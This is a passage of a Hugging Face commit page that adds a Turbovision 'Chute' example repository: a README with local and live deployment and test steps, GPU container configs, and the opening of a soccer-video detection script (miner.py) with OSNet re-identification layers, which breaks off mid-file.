aivertex95827 SuperBitDev commited on
Commit
9c8c43f
·
0 Parent(s):

Duplicate from SuperBitDev/turbo2

Browse files

Co-authored-by: Evan Low <SuperBitDev@users.noreply.huggingface.co>

.gitattributes ADDED
@@ -0,0 +1,36 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ *.7z filter=lfs diff=lfs merge=lfs -text
2
+ *.arrow filter=lfs diff=lfs merge=lfs -text
3
+ *.bin filter=lfs diff=lfs merge=lfs -text
4
+ *.bz2 filter=lfs diff=lfs merge=lfs -text
5
+ *.ckpt filter=lfs diff=lfs merge=lfs -text
6
+ *.ftz filter=lfs diff=lfs merge=lfs -text
7
+ *.gz filter=lfs diff=lfs merge=lfs -text
8
+ *.h5 filter=lfs diff=lfs merge=lfs -text
9
+ *.joblib filter=lfs diff=lfs merge=lfs -text
10
+ *.lfs.* filter=lfs diff=lfs merge=lfs -text
11
+ *.mlmodel filter=lfs diff=lfs merge=lfs -text
12
+ *.model filter=lfs diff=lfs merge=lfs -text
13
+ *.msgpack filter=lfs diff=lfs merge=lfs -text
14
+ *.npy filter=lfs diff=lfs merge=lfs -text
15
+ *.npz filter=lfs diff=lfs merge=lfs -text
16
+ *.onnx filter=lfs diff=lfs merge=lfs -text
17
+ *.ot filter=lfs diff=lfs merge=lfs -text
18
+ *.parquet filter=lfs diff=lfs merge=lfs -text
19
+ *.pb filter=lfs diff=lfs merge=lfs -text
20
+ *.pickle filter=lfs diff=lfs merge=lfs -text
21
+ *.pkl filter=lfs diff=lfs merge=lfs -text
22
+ *.pt filter=lfs diff=lfs merge=lfs -text
23
+ *.pth filter=lfs diff=lfs merge=lfs -text
24
+ *.rar filter=lfs diff=lfs merge=lfs -text
25
+ *.safetensors filter=lfs diff=lfs merge=lfs -text
26
+ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
27
+ *.tar.* filter=lfs diff=lfs merge=lfs -text
28
+ *.tar filter=lfs diff=lfs merge=lfs -text
29
+ *.tflite filter=lfs diff=lfs merge=lfs -text
30
+ *.tgz filter=lfs diff=lfs merge=lfs -text
31
+ *.wasm filter=lfs diff=lfs merge=lfs -text
32
+ *.xz filter=lfs diff=lfs merge=lfs -text
33
+ *.zip filter=lfs diff=lfs merge=lfs -text
34
+ *.zst filter=lfs diff=lfs merge=lfs -text
35
+ *tfevents* filter=lfs diff=lfs merge=lfs -text
36
+ osnet_model.pth.tar-100 filter=lfs diff=lfs merge=lfs -text
README.md ADDED
@@ -0,0 +1,92 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # 🚀 Example Chute for Turbovision 🪂
2
+
3
+ This repository demonstrates how to deploy a **Chute** via the **Turbovision CLI**, hosted on **Hugging Face Hub**.
4
+ It serves as a minimal example showcasing the required structure and workflow for integrating machine learning models, preprocessing, and orchestration into a reproducible Chute environment.
5
+
6
+ ## Repository Structure
7
+ The following two files **must be present** (in their current locations) for a successful deployment — their content can be modified as needed:
8
+
9
+ | File | Purpose |
10
+ |------|----------|
11
+ | `miner.py` | Defines the ML model type(s), orchestration, and all pre/postprocessing logic. |
12
+ | `config.yml` | Specifies machine configuration (e.g., GPU type, memory, environment variables). |
13
+
14
+ Other files — e.g., model weights, utility scripts, or dependencies — are **optional** and can be included as needed for your model. Note: Any required assets must be defined or contained **within this repo**, which is fully open-source, since all network-related operations (downloading challenge data, weights, etc.) are disabled **inside the Chute**
15
+
16
+ ## Overview
17
+
18
+ Below is a high-level diagram showing the interaction between Huggingface, Chutes and Turbovision:
19
+
20
+ ![](../images/miner.png)
21
+
22
+ ## Local Testing
23
+ After editing the `config.yml` and `miner.py` and saving it into your Huggingface Repo, you will want to test it works locally.
24
+
25
+ 1. Copy the file `scorevision/chute_tmeplate/turbovision_chute.py.j2` as a python file called `my_chute.py` and fill in the missing variables:
26
+ ```python
27
+ HF_REPO_NAME = "{{ huggingface_repository_name }}"
28
+ HF_REPO_REVISION = "{{ huggingface_repository_revision }}"
29
+ CHUTES_USERNAME = "{{ chute_username }}"
30
+ CHUTE_NAME = "{{ chute_name }}"
31
+ ```
32
+
33
+ 2. Run the following command to build the chute locally (Caution: there are known issues with the docker location when running this on a mac)
34
+ ```bash
35
+ chutes build my_chute:chute --local --public
36
+ ```
37
+
38
+ 3. Run the name of the docker image just built (i.e. `CHUTE_NAME`) and enter it
39
+ ```bash
40
+ docker run -p 8000:8000 -e CHUTES_EXECUTION_CONTEXT=REMOTE -it <image-name> /bin/bash
41
+ ```
42
+
43
+ 4. Run the file from within the container
44
+ ```bash
45
+ chutes run my_chute:chute --dev --debug
46
+ ```
47
+
48
+ 5. In another terminal, test the local endpoints to ensure there are no bugs
49
+ ```bash
50
+ curl -X POST http://localhost:8000/health -d '{}'
51
+ curl -X POST http://localhost:8000/predict -d '{"url": "https://scoredata.me/2025_03_14/35ae7a/h1_0f2ca0.mp4","meta": {}}'
52
+ ```
53
+
54
+ ## Live Testing
55
+ 1. If you have any chute with the same name (ie from a previous deployment), ensure you delete that first (or you will get an error when trying to build).
56
+ ```bash
57
+ chutes chutes list
58
+ ```
59
+ Take note of the chute id that you wish to delete (if any)
60
+ ```bash
61
+ chutes chutes delete <chute-id>
62
+ ```
63
+
64
+ You should also delete its associated image
65
+ ```bash
66
+ chutes images list
67
+ ```
68
+ Take note of the chute image id
69
+ ```bash
70
+ chutes images delete <chute-image-id>
71
+ ```
72
+
73
+ 2. Use Turbovision's CLI to build, deploy and commit on-chain (Note: you can skip the on-chain commit using `--no-commit`. You can also specify a past huggingface revision to point to using `--revision` and/or the local files you want to upload to your huggingface repo using `--model-path`)
74
+ ```bash
75
+ sv -vv push
76
+ ```
77
+
78
+ 3. When completed, warm up the chute (if its cold 🧊). (You can confirm its status using `chutes chutes list` or `chutes chutes get <chute-id>` if you already know its id). Note: Warming up can sometimes take a while but if the chute runs without errors (should be if you've tested locally first) and there are sufficient nodes (i.e. machines) available matching the `config.yml` you specified, the chute should become hot 🔥!
79
+ ```bash
80
+ chutes warmup <chute-id>
81
+ ```
82
+
83
+ 4. Test the chute's endpoints
84
+ ```bash
85
+ curl -X POST https://<YOUR-CHUTE-SLUG>.chutes.ai/health -d '{}' -H "Authorization: Bearer $CHUTES_API_KEY"
86
+ curl -X POST https://<YOUR-CHUTE-SLUG>.chutes.ai/predict -d '{"url": "https://scoredata.me/2025_03_14/35ae7a/h1_0f2ca0.mp4","meta": {}}' -H "Authorization: Bearer $CHUTES_API_KEY"
87
+ ```
88
+
89
+ 5. Test what your chute would get on a validator (this also applies any validation/integrity checks which may fail if you did not use the Turbovision CLI above to deploy the chute)
90
+ ```bash
91
+ sv -vv run-once
92
+ ```
chute_config.yml ADDED
@@ -0,0 +1,29 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ Image:
2
+ from_base: parachutes/python:3.12
3
+ run_command:
4
+ - pip install --upgrade setuptools wheel
5
+ - pip install --index-url https://download.pytorch.org/whl/cu128 torch torchvision
6
+ - pip install "ultralytics==8.3.222" "opencv-python-headless" "numpy" "pydantic"
7
+ - pip install scikit-learn
8
+ - pip install onnxruntime-gpu
9
+ set_workdir: /app
10
+ readme: "Image for chutes"
11
+
12
+ NodeSelector:
13
+ gpu_count: 1
14
+ min_vram_gb_per_gpu: 24
15
+ min_memory_gb: 32
16
+ min_cpu_count: 32
17
+
18
+ exclude:
19
+ - "5090"
20
+ - b200
21
+ - h200
22
+ - mi300x
23
+
24
+ Chute:
25
+ timeout_seconds: 900
26
+ concurrency: 4
27
+ max_instances: 5
28
+ scaling_threshold: 0.3
29
+ shutdown_after_seconds: 600000
hrnetv2_w48.yaml ADDED
@@ -0,0 +1,35 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ MODEL:
2
+ IMAGE_SIZE: [960, 540]
3
+ NUM_JOINTS: 58
4
+ PRETRAIN: ''
5
+ EXTRA:
6
+ FINAL_CONV_KERNEL: 1
7
+ STAGE1:
8
+ NUM_MODULES: 1
9
+ NUM_BRANCHES: 1
10
+ BLOCK: BOTTLENECK
11
+ NUM_BLOCKS: [4]
12
+ NUM_CHANNELS: [64]
13
+ FUSE_METHOD: SUM
14
+ STAGE2:
15
+ NUM_MODULES: 1
16
+ NUM_BRANCHES: 2
17
+ BLOCK: BASIC
18
+ NUM_BLOCKS: [4, 4]
19
+ NUM_CHANNELS: [48, 96]
20
+ FUSE_METHOD: SUM
21
+ STAGE3:
22
+ NUM_MODULES: 4
23
+ NUM_BRANCHES: 3
24
+ BLOCK: BASIC
25
+ NUM_BLOCKS: [4, 4, 4]
26
+ NUM_CHANNELS: [48, 96, 192]
27
+ FUSE_METHOD: SUM
28
+ STAGE4:
29
+ NUM_MODULES: 3
30
+ NUM_BRANCHES: 4
31
+ BLOCK: BASIC
32
+ NUM_BLOCKS: [4, 4, 4, 4]
33
+ NUM_CHANNELS: [48, 96, 192, 384]
34
+ FUSE_METHOD: SUM
35
+
keypoint_detect.pt ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:7ea78fa76aaf94976a8eca428d6e3c59697a93430cba1a4603e20284b61f5113
3
+ size 264964645
miner.py ADDED
@@ -0,0 +1,1697 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # FULL miner.py (self-contained)
2
+ # -------------------------------------------------------------
3
+
4
+ import time
5
+ import cv2
6
+ import torch
7
+ import numpy as np
8
+ from pathlib import Path
9
+ from typing import Iterable, Generator, List, TypeVar, Tuple
10
+ from numpy import ndarray
11
+ from pydantic import BaseModel
12
+ from ultralytics import YOLO
13
+ import datetime
14
+ # ------------------------------
15
+ # DATA MODELS
16
+ # ------------------------------
17
+
18
+ class BoundingBox(BaseModel):
19
+ x1: int
20
+ y1: int
21
+ x2: int
22
+ y2: int
23
+ cls_id: int
24
+ conf: float
25
+ track_id: int | None = None
26
+
27
+
28
+ class TVFrameResult(BaseModel):
29
+ frame_id: int
30
+ boxes: list[BoundingBox]
31
+ keypoints: list[tuple[int, int]]
32
+
33
+ # ------------------------------
34
+ # BATCH UTILITY
35
+ # ------------------------------
36
+
37
+ V = TypeVar("V")
38
+ kp_threshold = 0.3
39
+
40
+ def create_batches(sequence: Iterable[V], batch_size: int) -> Generator[List[V], None, None]:
41
+ batch_size = max(batch_size, 1)
42
+ current_batch = []
43
+ for element in sequence:
44
+ if len(current_batch) == batch_size:
45
+ yield current_batch
46
+ current_batch = []
47
+ current_batch.append(element)
48
+ if current_batch:
49
+ yield current_batch
50
+
51
+
52
+
53
+ # class TeamClassifier:
54
+ # def __init__(self):
55
+ # self.color_refs = []
56
+ # self.fitted = False
57
+
58
+ # def _center_crop(self, crop: np.ndarray) -> np.ndarray:
59
+ # h, w = crop.shape[:2]
60
+ # return crop[int(h*0.2):int(h*0.5), int(w*0.2):int(w*0.8)]
61
+
62
+ # def _extract_color(self, crop: np.ndarray) -> float:
63
+ # if crop is None or crop.size == 0:
64
+ # return 0.0
65
+ # crop = self._center_crop(crop)
66
+ # hsv = cv2.cvtColor(crop, cv2.COLOR_BGR2HSV)
67
+ # return float(hsv[:, :, 0].mean())
68
+
69
+ # def fit(self, crops: list[np.ndarray]):
70
+ # if len(crops) < 6:
71
+ # return
72
+ # hs = np.array([self._extract_color(c) for c in crops])
73
+ # thresh = np.median(hs)
74
+ # self.color_refs = [(h, 0 if h < thresh else 1) for h in hs]
75
+ # self.fitted = True
76
+
77
+ # def predict(self, crops: list[np.ndarray]) -> np.ndarray:
78
+ # if not self.fitted:
79
+ # self.fit(crops)
80
+ # team_ids = []
81
+ # for crop in crops:
82
+ # h = self._extract_color(crop)
83
+ # if not self.color_refs:
84
+ # team_ids.append(0)
85
+ # continue
86
+ # ref_h, ref_team = min(self.color_refs, key=lambda t: abs(t[0] - h))
87
+ # team_ids.append(ref_team)
88
+ # return np.array(team_ids, dtype=int)
89
+
90
+ # ------------------------------
91
+ # TEAM CLASSIFIER
92
+ # ------------------------------
93
+
94
+
95
+ ##########
96
+ # OSNET
97
+ ##########
98
+
99
+ from torch import nn
100
+ from torch.nn import functional as F
101
+ from sklearn.cluster import KMeans
102
+ from PIL import Image
103
+ from collections import defaultdict
104
+
105
+ _OSNET_MODEL = None
106
+ team_classifier_path = None
107
+
108
+ BALL_ID = 0
109
+ GK_ID = 1
110
+ PLAYER_ID = 2
111
+ REF_ID = 3
112
+ # Team assignment: 6 = team 1, 7 = team 2; 8 = unassigned (outlier, e.g. misdetected referee/GK)
113
+ TEAM_1_ID = 6
114
+ TEAM_2_ID = 7
115
+
116
+ pretrained_urls = {
117
+ 'osnet_x1_0':
118
+ 'https://drive.google.com/uc?id=1LaG1EJpHrxdAxKnSCJ_i0u-nbxSAeiFY',
119
+ }
120
+
121
+ class ConvLayer(nn.Module):
122
+ """Convolution layer (conv + bn + relu)."""
123
+
124
+ def __init__(
125
+ self,
126
+ in_channels,
127
+ out_channels,
128
+ kernel_size,
129
+ stride=1,
130
+ padding=0,
131
+ groups=1,
132
+ IN=False
133
+ ):
134
+ super(ConvLayer, self).__init__()
135
+ self.conv = nn.Conv2d(
136
+ in_channels,
137
+ out_channels,
138
+ kernel_size,
139
+ stride=stride,
140
+ padding=padding,
141
+ bias=False,
142
+ groups=groups
143
+ )
144
+ if IN:
145
+ self.bn = nn.InstanceNorm2d(out_channels, affine=True)
146
+ else:
147
+ self.bn = nn.BatchNorm2d(out_channels)
148
+ self.relu = nn.ReLU(inplace=True)
149
+
150
+ def forward(self, x):
151
+ x = self.conv(x)
152
+ x = self.bn(x)
153
+ x = self.relu(x)
154
+ return x
155
+
156
+
157
+ class Conv1x1(nn.Module):
158
+ """1x1 convolution + bn + relu."""
159
+
160
+ def __init__(self, in_channels, out_channels, stride=1, groups=1):
161
+ super(Conv1x1, self).__init__()
162
+ self.conv = nn.Conv2d(
163
+ in_channels,
164
+ out_channels,
165
+ 1,
166
+ stride=stride,
167
+ padding=0,
168
+ bias=False,
169
+ groups=groups
170
+ )
171
+ self.bn = nn.BatchNorm2d(out_channels)
172
+ self.relu = nn.ReLU(inplace=True)
173
+
174
+ def forward(self, x):
175
+ x = self.conv(x)
176
+ x = self.bn(x)
177
+ x = self.relu(x)
178
+ return x
179
+
180
+
181
+ class Conv1x1Linear(nn.Module):
182
+ """1x1 convolution + bn (w/o non-linearity)."""
183
+
184
+ def __init__(self, in_channels, out_channels, stride=1):
185
+ super(Conv1x1Linear, self).__init__()
186
+ self.conv = nn.Conv2d(
187
+ in_channels, out_channels, 1, stride=stride, padding=0, bias=False
188
+ )
189
+ self.bn = nn.BatchNorm2d(out_channels)
190
+
191
+ def forward(self, x):
192
+ x = self.conv(x)
193
+ x = self.bn(x)
194
+ return x
195
+
196
+
197
+ class Conv3x3(nn.Module):
198
+ """3x3 convolution + bn + relu."""
199
+
200
+ def __init__(self, in_channels, out_channels, stride=1, groups=1):
201
+ super(Conv3x3, self).__init__()
202
+ self.conv = nn.Conv2d(
203
+ in_channels,
204
+ out_channels,
205
+ 3,
206
+ stride=stride,
207
+ padding=1,
208
+ bias=False,
209
+ groups=groups
210
+ )
211
+ self.bn = nn.BatchNorm2d(out_channels)
212
+ self.relu = nn.ReLU(inplace=True)
213
+
214
+ def forward(self, x):
215
+ x = self.conv(x)
216
+ x = self.bn(x)
217
+ x = self.relu(x)
218
+ return x
219
+
220
+
221
+ class LightConv3x3(nn.Module):
222
+ """Lightweight 3x3 convolution.
223
+
224
+ 1x1 (linear) + dw 3x3 (nonlinear).
225
+ """
226
+
227
+ def __init__(self, in_channels, out_channels):
228
+ super(LightConv3x3, self).__init__()
229
+ self.conv1 = nn.Conv2d(
230
+ in_channels, out_channels, 1, stride=1, padding=0, bias=False
231
+ )
232
+ self.conv2 = nn.Conv2d(
233
+ out_channels,
234
+ out_channels,
235
+ 3,
236
+ stride=1,
237
+ padding=1,
238
+ bias=False,
239
+ groups=out_channels
240
+ )
241
+ self.bn = nn.BatchNorm2d(out_channels)
242
+ self.relu = nn.ReLU(inplace=True)
243
+
244
+ def forward(self, x):
245
+ x = self.conv1(x)
246
+ x = self.conv2(x)
247
+ x = self.bn(x)
248
+ x = self.relu(x)
249
+ return x
250
+
251
+
252
+ ##########
253
+ # Building blocks for omni-scale feature learning
254
+ ##########
255
+ class ChannelGate(nn.Module):
256
+ """A mini-network that generates channel-wise gates conditioned on input tensor."""
257
+
258
+ def __init__(
259
+ self,
260
+ in_channels,
261
+ num_gates=None,
262
+ return_gates=False,
263
+ gate_activation='sigmoid',
264
+ reduction=16,
265
+ layer_norm=False
266
+ ):
267
+ super(ChannelGate, self).__init__()
268
+ if num_gates is None:
269
+ num_gates = in_channels
270
+ self.return_gates = return_gates
271
+ self.global_avgpool = nn.AdaptiveAvgPool2d(1)
272
+ self.fc1 = nn.Conv2d(
273
+ in_channels,
274
+ in_channels // reduction,
275
+ kernel_size=1,
276
+ bias=True,
277
+ padding=0
278
+ )
279
+ self.norm1 = None
280
+ if layer_norm:
281
+ self.norm1 = nn.LayerNorm((in_channels // reduction, 1, 1))
282
+ self.relu = nn.ReLU(inplace=True)
283
+ self.fc2 = nn.Conv2d(
284
+ in_channels // reduction,
285
+ num_gates,
286
+ kernel_size=1,
287
+ bias=True,
288
+ padding=0
289
+ )
290
+ if gate_activation == 'sigmoid':
291
+ self.gate_activation = nn.Sigmoid()
292
+ elif gate_activation == 'relu':
293
+ self.gate_activation = nn.ReLU(inplace=True)
294
+ elif gate_activation == 'linear':
295
+ self.gate_activation = None
296
+ else:
297
+ raise RuntimeError(
298
+ "Unknown gate activation: {}".format(gate_activation)
299
+ )
300
+
301
+ def forward(self, x):
302
+ input = x
303
+ x = self.global_avgpool(x)
304
+ x = self.fc1(x)
305
+ if self.norm1 is not None:
306
+ x = self.norm1(x)
307
+ x = self.relu(x)
308
+ x = self.fc2(x)
309
+ if self.gate_activation is not None:
310
+ x = self.gate_activation(x)
311
+ if self.return_gates:
312
+ return x
313
+ return input * x
314
+
315
+
316
+ class OSBlock(nn.Module):
317
+ """Omni-scale feature learning block."""
318
+
319
+ def __init__(
320
+ self,
321
+ in_channels,
322
+ out_channels,
323
+ IN=False,
324
+ bottleneck_reduction=4,
325
+ **kwargs
326
+ ):
327
+ super(OSBlock, self).__init__()
328
+ mid_channels = out_channels // bottleneck_reduction
329
+ self.conv1 = Conv1x1(in_channels, mid_channels)
330
+ self.conv2a = LightConv3x3(mid_channels, mid_channels)
331
+ self.conv2b = nn.Sequential(
332
+ LightConv3x3(mid_channels, mid_channels),
333
+ LightConv3x3(mid_channels, mid_channels),
334
+ )
335
+ self.conv2c = nn.Sequential(
336
+ LightConv3x3(mid_channels, mid_channels),
337
+ LightConv3x3(mid_channels, mid_channels),
338
+ LightConv3x3(mid_channels, mid_channels),
339
+ )
340
+ self.conv2d = nn.Sequential(
341
+ LightConv3x3(mid_channels, mid_channels),
342
+ LightConv3x3(mid_channels, mid_channels),
343
+ LightConv3x3(mid_channels, mid_channels),
344
+ LightConv3x3(mid_channels, mid_channels),
345
+ )
346
+ self.gate = ChannelGate(mid_channels)
347
+ self.conv3 = Conv1x1Linear(mid_channels, out_channels)
348
+ self.downsample = None
349
+ if in_channels != out_channels:
350
+ self.downsample = Conv1x1Linear(in_channels, out_channels)
351
+ self.IN = None
352
+ if IN:
353
+ self.IN = nn.InstanceNorm2d(out_channels, affine=True)
354
+
355
+ def forward(self, x):
356
+ identity = x
357
+ x1 = self.conv1(x)
358
+ x2a = self.conv2a(x1)
359
+ x2b = self.conv2b(x1)
360
+ x2c = self.conv2c(x1)
361
+ x2d = self.conv2d(x1)
362
+ x2 = self.gate(x2a) + self.gate(x2b) + self.gate(x2c) + self.gate(x2d)
363
+ x3 = self.conv3(x2)
364
+ if self.downsample is not None:
365
+ identity = self.downsample(identity)
366
+ out = x3 + identity
367
+ if self.IN is not None:
368
+ out = self.IN(out)
369
+ return F.relu(out)
370
+
371
+
372
+ ##########
373
+ # Network architecture
374
+ ##########
375
+ class OSNet(nn.Module):
376
+ """Omni-Scale Network.
377
+
378
+ Reference:
379
+ - Zhou et al. Omni-Scale Feature Learning for Person Re-Identification. ICCV, 2019.
380
+ - Zhou et al. Learning Generalisable Omni-Scale Representations
381
+ for Person Re-Identification. TPAMI, 2021.
382
+ """
383
+
384
+ def __init__(
385
+ self,
386
+ num_classes,
387
+ blocks,
388
+ layers,
389
+ channels,
390
+ feature_dim=512,
391
+ loss='softmax',
392
+ IN=False,
393
+ **kwargs
394
+ ):
395
+ super(OSNet, self).__init__()
396
+ num_blocks = len(blocks)
397
+ assert num_blocks == len(layers)
398
+ assert num_blocks == len(channels) - 1
399
+ self.loss = loss
400
+ self.feature_dim = feature_dim
401
+
402
+ # convolutional backbone
403
+ self.conv1 = ConvLayer(3, channels[0], 7, stride=2, padding=3, IN=IN)
404
+ self.maxpool = nn.MaxPool2d(3, stride=2, padding=1)
405
+ self.conv2 = self._make_layer(
406
+ blocks[0],
407
+ layers[0],
408
+ channels[0],
409
+ channels[1],
410
+ reduce_spatial_size=True,
411
+ IN=IN
412
+ )
413
+ self.conv3 = self._make_layer(
414
+ blocks[1],
415
+ layers[1],
416
+ channels[1],
417
+ channels[2],
418
+ reduce_spatial_size=True
419
+ )
420
+ self.conv4 = self._make_layer(
421
+ blocks[2],
422
+ layers[2],
423
+ channels[2],
424
+ channels[3],
425
+ reduce_spatial_size=False
426
+ )
427
+ self.conv5 = Conv1x1(channels[3], channels[3])
428
+ self.global_avgpool = nn.AdaptiveAvgPool2d(1)
429
+ # fully connected layer
430
+ self.fc = self._construct_fc_layer(
431
+ self.feature_dim, channels[3], dropout_p=None
432
+ )
433
+ # identity classification layer
434
+ self.classifier = nn.Linear(self.feature_dim, num_classes)
435
+
436
+ self._init_params()
437
+
438
+ def _make_layer(
439
+ self,
440
+ block,
441
+ layer,
442
+ in_channels,
443
+ out_channels,
444
+ reduce_spatial_size,
445
+ IN=False
446
+ ):
447
+ layers = []
448
+
449
+ layers.append(block(in_channels, out_channels, IN=IN))
450
+ for i in range(1, layer):
451
+ layers.append(block(out_channels, out_channels, IN=IN))
452
+
453
+ if reduce_spatial_size:
454
+ layers.append(
455
+ nn.Sequential(
456
+ Conv1x1(out_channels, out_channels),
457
+ nn.AvgPool2d(2, stride=2)
458
+ )
459
+ )
460
+
461
+ return nn.Sequential(*layers)
462
+
463
+ def _construct_fc_layer(self, fc_dims, input_dim, dropout_p=None):
464
+ if fc_dims is None or fc_dims < 0:
465
+ self.feature_dim = input_dim
466
